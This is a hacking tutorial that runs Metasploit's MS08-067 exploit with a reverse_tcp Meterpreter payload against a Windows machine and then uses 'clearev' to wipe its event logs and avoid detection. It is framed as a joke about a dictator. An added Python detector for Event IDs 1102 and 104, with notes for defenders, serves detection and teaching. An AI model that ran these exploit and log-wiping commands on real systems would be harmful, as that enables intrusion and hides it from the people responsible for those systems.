Hack Like a Pro: How to Cover Your Tracks So You Aren't Detected
Welcome back, my greenhorn hackers!
Congratulations on your successful hack that saved the world from nuclear annihilation by our little, bellicose, Twinkie-eating dictator. The rest of the world may not know what you did, but I do. Good job!
Now that we've hacked into the malevolent dictator's computer and temporarily disabled his nuclear launch capability, we have to think about covering our tracks so that he and his minions can't trace our good works back to us.
So, in this hack, we will go into his computer again, implant the Meterpreter, and remove from his log files any trace that we had been there. Let's fire up Metasploit and get to work on removing any evidence that we had ever been on the dictator's computer.
Let's start with the same hack we used to get into the dictator's computer initially:
But instead of using the VNC payload, we will load the Meterpreter payload. Type:
- msf > use exploit/windows/smb/ms08_067_netapi
Before we move on, let's learn a bit more about this exploit. Type:
- msf exploit(ms08_067_netapi) > info
This should bring up the screen shown in the screenshot below, which provides us with some basic information about this exploit. We can see that this hack exploits a parsing flaw in the netapi DLL, which lets us place our own payload on the system; in this case, that payload is the Meterpreter.
Now we load the payload by typing:
- msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Now that we have the exploit and payload set, we need to set the options. In this case, we need to set LHOST (us, the attacker) and RHOST (the victim, our belligerent dictator's computer). Simply set LHOST to the IP address of your computer and RHOST to the IP address of his.
Now that we have everything set to take control, we just type:
- msf exploit(ms08_067_netapi) > exploit
If we are successful, we should see a Meterpreter prompt on our screen. We now have total control of his system!
At the Meterpreter prompt, we now type:
- meterpreter > clearev
As you can see in the screenshot above, this command clears the event logs on our bellicose dictator's computer so that he and his minions have no clue that we've ever been there. If we could look at the event logs on his computer, we would see that all events have been cleared.
This is critical both to keep us from being found out and to preserve our continued access to his computer. Once they know that someone has hacked his computer, it's likely they will take measures to prevent our returning to it.
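From the other side of the screen, the wipe itself is evidence. When the Security log is cleared, Windows writes Event ID 1102 ("The audit log was cleared") as the very first entry of the fresh log; clearing the System or Application log writes Event ID 104. Here is an added example, not from the original article or from Metasploit, of the detection logic a defender would run over an exported event log to spot exactly the clearing described above. The sample records are constructed in the shape of a one-object-per-line JSON export (field names such as `TimeCreated`, `LogName`, `ProviderName`, `Id` and `Message` are assumed), and the 60-second window and the `Alert` type are assumptions of this example.

```python
"""Detect Windows event-log clearing in an exported event stream.

Added example (not from the original article). Windows records the act
of clearing a log: Event ID 1102 from Microsoft-Windows-Eventlog in the
Security log, Event ID 104 from the same provider in System/Application.
All sample records below are constructed; field names follow the shape
of a one-JSON-object-per-line export and are an assumption of this example.
"""
import json
from dataclasses import dataclass
from datetime import datetime

# (provider, event id) pairs Windows writes when a log is cleared.
LOG_CLEARED_IDS = {
    ("Microsoft-Windows-Eventlog", 1102),  # Security log cleared
    ("Microsoft-Windows-Eventlog", 104),   # System or Application log cleared
}

# Constructed sample export: normal activity, then all three logs wiped
# within seconds of each other, then normal activity resumes.
SAMPLE_EXPORT = """
{"TimeCreated":"2024-03-01T10:00:01","LogName":"Security","ProviderName":"Microsoft-Windows-Security-Auditing","Id":4624,"Message":"An account was successfully logged on."}
{"TimeCreated":"2024-03-01T10:00:05","LogName":"Security","ProviderName":"Microsoft-Windows-Security-Auditing","Id":4688,"Message":"A new process has been created."}
{"TimeCreated":"2024-03-01T10:02:10","LogName":"Security","ProviderName":"Microsoft-Windows-Eventlog","Id":1102,"Message":"The audit log was cleared."}
{"TimeCreated":"2024-03-01T10:02:11","LogName":"System","ProviderName":"Microsoft-Windows-Eventlog","Id":104,"Message":"The System log file was cleared."}
{"TimeCreated":"2024-03-01T10:02:11","LogName":"Application","ProviderName":"Microsoft-Windows-Eventlog","Id":104,"Message":"The Application log file was cleared."}
{"TimeCreated":"2024-03-01T10:03:00","LogName":"System","ProviderName":"Service Control Manager","Id":7036,"Message":"The Windows Update service entered the running state."}
"""


@dataclass(frozen=True)
class Alert:
    """One log-clearing event worth escalating (assumed structure)."""
    time: str
    log: str
    event_id: int
    detail: str


def parse_export(text):
    """Parse one JSON object per line, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_log_clearing(events):
    """Return an Alert for every record whose provider/id pair marks a cleared log."""
    alerts = []
    for ev in events:
        if (ev.get("ProviderName"), ev.get("Id")) in LOG_CLEARED_IDS:
            alerts.append(Alert(ev["TimeCreated"], ev["LogName"], ev["Id"],
                                ev.get("Message", "").splitlines()[0]))
    return alerts


def wiped_logs_in_window(alerts, window_seconds=60):
    """Names of the logs cleared within `window_seconds` of the first clearing.

    One log cleared by an administrator is routine; Application, System and
    Security all cleared in the same burst is the footprint of a scripted wipe
    and should be escalated rather than filed as housekeeping.
    """
    if not alerts:
        return set()
    start = datetime.fromisoformat(alerts[0].time)
    return {
        a.log for a in alerts
        if 0 <= (datetime.fromisoformat(a.time) - start).total_seconds() <= window_seconds
    }


if __name__ == "__main__":
    found = find_log_clearing(parse_export(SAMPLE_EXPORT))
    for a in found:
        print(f"{a.time} {a.log:<12} id={a.event_id} {a.detail}")
    print("logs wiped in one burst:", sorted(wiped_logs_in_window(found)))
```

The practical consequence for a defender is that a local wipe removes only the local copy: if events are forwarded to a collector (Windows Event Forwarding or a SIEM agent) as they are written, the 4624 and 4688 records that preceded the 1102 are still on the collector, and the 1102 itself arrives as the alarm.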
Now, make sure to come back for more hacking fun and games on our dictator's computer!